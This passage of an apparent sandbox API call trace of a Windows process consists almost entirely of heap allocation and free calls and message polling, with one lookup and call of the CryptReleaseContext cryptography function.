dwFlags=0x0, lpMem=0x12ef960 | out: hHeap=0x12c0000) returned 1 [0121.640] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd820 [0121.641] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd700 [0121.641] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efac0 [0121.641] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd790 | out: hHeap=0x12c0000) returned 1 [0121.641] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff460 | out: hHeap=0x12c0000) returned 1 [0121.641] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd700 | out: hHeap=0x12c0000) returned 1 [0121.641] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0121.641] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd820 | out: hHeap=0x12c0000) returned 1 [0121.641] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.641] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef940 [0121.641] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9b0 [0121.641] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918d8 [0121.641] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918d8 | out: hHeap=0x12c0000) returned 1 [0121.641] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9b0 | out: hHeap=0x12c0000) returned 1 [0121.642] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.642] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a98 [0121.642] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.642] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a98 | out: hHeap=0x12c0000) returned 1 [0121.642] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.642] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef960 [0121.642] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9f0 [0121.642] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491ad8 [0121.642] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491ad8 | out: hHeap=0x12c0000) returned 1 [0121.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9f0 | out: hHeap=0x12c0000) returned 1 [0121.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef960 | out: hHeap=0x12c0000) returned 1 [0121.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ed8 [0121.643] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ed8 | out: hHeap=0x12c0000) returned 1 [0121.643] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9b0 [0121.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef900 [0121.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917f8 [0121.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917f8 | out: hHeap=0x12c0000) returned 1 [0121.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0121.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9b0 | out: hHeap=0x12c0000) returned 1 [0121.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c18 [0121.644] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c18 | out: hHeap=0x12c0000) returned 1 [0121.644] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efab0 [0121.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8d0 [0121.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491ab8 [0121.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491ab8 | out: hHeap=0x12c0000) returned 1 [0121.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8d0 | out: hHeap=0x12c0000) returned 1 [0121.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efab0 | out: hHeap=0x12c0000) returned 1 [0121.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458cd8 [0121.644] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458cd8 | out: hHeap=0x12c0000) returned 1 [0121.644] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efab0 [0121.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0121.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0121.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0121.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0121.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efab0 | out: hHeap=0x12c0000) returned 1 [0121.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458dd8 [0121.645] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458dd8 | out: hHeap=0x12c0000) returned 1 [0121.645] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0121.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9f0 [0121.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0121.646] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0121.646] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9f0 | out: hHeap=0x12c0000) returned 1 [0121.646] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0121.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.646] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.646] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.646] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8f0 [0121.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef940 [0121.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0121.647] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0121.647] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.647] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8f0 | out: hHeap=0x12c0000) returned 1 [0121.647] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458998 [0121.647] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.647] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458998 | out: hHeap=0x12c0000) returned 1 [0121.647] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.647] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efab0 [0121.647] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9d0 [0121.647] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a38 [0121.647] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a38 | out: hHeap=0x12c0000) returned 1 [0121.647] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9d0 | out: hHeap=0x12c0000) returned 1 [0121.647] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efab0 | out: hHeap=0x12c0000) returned 1 [0121.647] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458bd8 [0121.647] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.647] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff0c8 [0121.647] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd898 [0121.648] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef970 [0121.648] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9c0 [0121.648] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd988 [0121.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9c0 | out: hHeap=0x12c0000) returned 1 [0121.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd988 | out: hHeap=0x12c0000) returned 1 [0121.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef970 | out: hHeap=0x12c0000) returned 1 [0121.648] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8b0 [0121.648] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0121.648] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd790 [0121.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0121.648] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd868 [0121.648] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef940 [0121.649] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd970 [0121.649] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.649] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd730 [0121.649] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef940 [0121.649] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7a8 [0121.649] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.649] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7c0 [0121.649] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8d0 [0121.649] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa00 [0121.649] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd958 [0121.649] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa00 | out: hHeap=0x12c0000) returned 1 [0121.649] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd958 | out: hHeap=0x12c0000) returned 1 [0121.649] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8d0 | out: hHeap=0x12c0000) returned 1 [0121.650] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8c8 [0121.650] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9a0 [0121.650] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd700 [0121.650] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0121.650] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd928 [0121.650] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa30 [0121.650] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7d8 [0121.650] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa30 | out: hHeap=0x12c0000) returned 1 [0121.650] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa60 [0121.650] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd958 [0121.650] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7f0 [0121.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef910 [0121.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef9f0 [0121.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd880 [0121.651] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7f0 | out: hHeap=0x12c0000) returned 1 [0121.651] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef910 | out: hHeap=0x12c0000) returned 1 [0121.651] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd880 | out: hHeap=0x12c0000) returned 1 [0121.651] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9f0 | out: hHeap=0x12c0000) returned 1 [0121.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff190 [0121.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef9a0 [0121.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd988 [0121.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef9b0 [0121.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef940 [0121.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd940 [0121.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd988 | out: hHeap=0x12c0000) returned 1 [0121.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9b0 | out: hHeap=0x12c0000) returned 1 [0121.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd940 | out: hHeap=0x12c0000) returned 1 [0121.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa50 [0121.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd880 [0121.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8d0 [0121.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa20 [0121.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd940 [0121.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd880 | out: hHeap=0x12c0000) returned 1 [0121.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8d0 | out: hHeap=0x12c0000) returned 1 [0121.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd940 | out: hHeap=0x12c0000) returned 1 [0121.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0121.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd940 [0121.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa80 [0121.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0121.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x1491b38 [0121.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1491b38, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0121.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd940 | out: hHeap=0x12c0000) returned 1 [0121.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff280 [0121.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0121.656] GetProcAddress (hModule=0x77820000, lpProcName="CryptReleaseContext") returned 0x77840650 [0121.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff280 | out: hHeap=0x12c0000) returned 1 [0121.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0121.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff398 [0121.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef960 [0121.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa40 [0121.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef960 | out: hHeap=0x12c0000) returned 1 [0121.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0121.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff398 | out: hHeap=0x12c0000) returned 1 [0121.656] CryptReleaseContext (hProv=0x148ef18, dwFlags=0x0) returned 1 [0121.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0121.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x133cac0 [0121.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd808 [0121.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8e0 [0121.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd988 [0121.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7f0 [0121.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef700 [0121.657] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7f0 | out: hHeap=0x12c0000) returned 1 [0121.657] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0121.657] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd988 | out: hHeap=0x12c0000) returned 1 [0121.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd940 [0121.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd820 [0121.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd988 [0121.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0121.657] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd988 | out: hHeap=0x12c0000) returned 1 [0121.657] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.657] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd820 | out: hHeap=0x12c0000) returned 1 [0121.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7f0 [0121.658] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd820 [0121.658] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd838 [0121.658] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef700 [0121.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd838 | out: hHeap=0x12c0000) returned 1 [0121.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0121.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd820 | out: hHeap=0x12c0000) returned 1 [0121.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0121.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa50 | out: hHeap=0x12c0000) returned 1 [0121.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff190 | out: hHeap=0x12c0000) returned 1 [0121.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd958 | out: hHeap=0x12c0000) returned 1 [0121.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa60 | out: hHeap=0x12c0000) returned 1 [0121.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd898 | out: hHeap=0x12c0000) returned 1 [0121.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd790 | out: hHeap=0x12c0000) returned 1 [0121.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8b0 | out: hHeap=0x12c0000) returned 1 [0121.659] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd970 | out: hHeap=0x12c0000) returned 1 [0121.659] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd868 | out: hHeap=0x12c0000) returned 1 [0121.659] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7a8 | out: hHeap=0x12c0000) returned 1 [0121.659] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd730 | out: hHeap=0x12c0000) returned 1 [0121.659] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7c0 | out: hHeap=0x12c0000) returned 1 [0121.659] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd700 | out: hHeap=0x12c0000) returned 1 [0121.659] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8c8 | out: hHeap=0x12c0000) returned 1 [0121.659] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7d8 | out: hHeap=0x12c0000) returned 1 [0121.659] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd928 | out: hHeap=0x12c0000) returned 1 [0121.667] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0c8 | out: hHeap=0x12c0000) returned 1 [0121.667] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8e0 | out: hHeap=0x12c0000) returned 1 [0121.667] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd940 | out: hHeap=0x12c0000) returned 1 [0121.667] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7f0 | out: hHeap=0x12c0000) returned 1 [0121.667] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd808 | out: hHeap=0x12c0000) returned 1 [0121.667] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x133cac0 | out: hHeap=0x12c0000) returned 1 [0121.667] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.667] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.667] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff0c8 [0121.667] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd790 [0121.667] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0121.667] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8e0 [0121.667] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0121.668] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8e0 | out: hHeap=0x12c0000) returned 1 [0121.668] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd790 | out: hHeap=0x12c0000) returned 1 